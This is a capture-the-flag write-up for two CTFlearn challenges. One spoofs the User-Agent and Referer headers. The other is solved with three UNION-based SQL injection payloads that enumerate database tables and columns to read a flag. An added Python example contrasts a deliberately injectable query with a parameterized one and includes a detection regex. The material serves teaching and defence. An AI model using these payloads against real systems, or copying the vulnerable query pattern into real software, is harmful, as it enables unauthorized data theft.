CTFlearn solution: Don’t Bump Your Head(er)

When viewing the page source, we found a message:

Then we use Burp Suite to intercept the request and change the User-Agent header to:

User-Agent: Sup3rS3cr3tAg3nt

This produced another message:

So we send the request with both of these headers set:

User-Agent: Sup3rS3cr3tAg3nt
Referer: awesomesauce.com

With that, the page returned the flag:

Flag: flag{did_this_m3ss_with_y0ur_h34d}

CTFlearn solution: Inj3ction Time

In this challenge, we first list all table names with the payload:

1 union SELECT null,table_name,null,null FROM information_schema.tables--

and we found the table "w0w_y0u_f0und_m3".

Then we list the column names with the payload:

1 union SELECT null,column_name,null,null FROM information_schema.columns--

and we found the column "f0und_m3".

Finally, we read that column from the table with the payload:

1 union SELECT null,f0und_m3,null,null FROM w0w_y0u_f0und_m3--

and the response contains the flag.

Flag: abctf{uni0n_1s_4_gr34t_c0mm4nd}
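To show why the payload above works and how the lookup should have been written, here is an added example (not part of the challenge or the original writeup). It builds a constructed in-memory SQLite database that reuses the table and column names from the writeup with a placeholder flag, runs the final payload against a string-concatenated query, and then against a validated, parameterized one; the `looks_like_union_injection` detector is a hypothetical helper for log review.

```python
import re
import sqlite3

# Constructed in-memory database mirroring the challenge: the table and column
# names come from the writeup, the row contents are placeholders.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE webpages(id INTEGER, title TEXT, url TEXT, created TEXT);
        INSERT INTO webpages VALUES (1, 'Home', 'https://example.invalid/', '2018-01-01');
        CREATE TABLE w0w_y0u_f0und_m3(f0und_m3 TEXT);
        INSERT INTO w0w_y0u_f0und_m3 VALUES ('abctf{placeholder_not_the_real_flag}');
    """)
    return conn

# The final payload from the writeup.
PAYLOAD = "1 union SELECT null,f0und_m3,null,null FROM w0w_y0u_f0und_m3--"

def lookup_vulnerable(conn, user_id):
    # The id is pasted straight into the statement, so the UNION and the
    # trailing comment become part of the query the database executes.
    sql = f"SELECT id, title, url, created FROM webpages WHERE id = {user_id}"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_id):
    # Two independent layers: reject anything that is not an integer, then
    # bind the value as a parameter so it can never be parsed as SQL.
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, url, created FROM webpages WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()

# Coarse detector (hypothetical helper) for the UNION-based enumeration pattern
# shown above; useful as a log-review filter, not as the only line of defence.
UNION_PATTERN = re.compile(r"\bunion\b.*\bselect\b|information_schema", re.IGNORECASE)

def looks_like_union_injection(value):
    return bool(UNION_PATTERN.search(value))

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", lookup_vulnerable(conn, PAYLOAD))
    print("detector:", looks_like_union_injection(PAYLOAD))
    try:
        lookup_hardened(conn, PAYLOAD)
    except ValueError as exc:
        print("hardened:", exc)
```

The vulnerable lookup returns the placeholder flag as an extra row, while the hardened lookup rejects the payload before it ever reaches the database.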
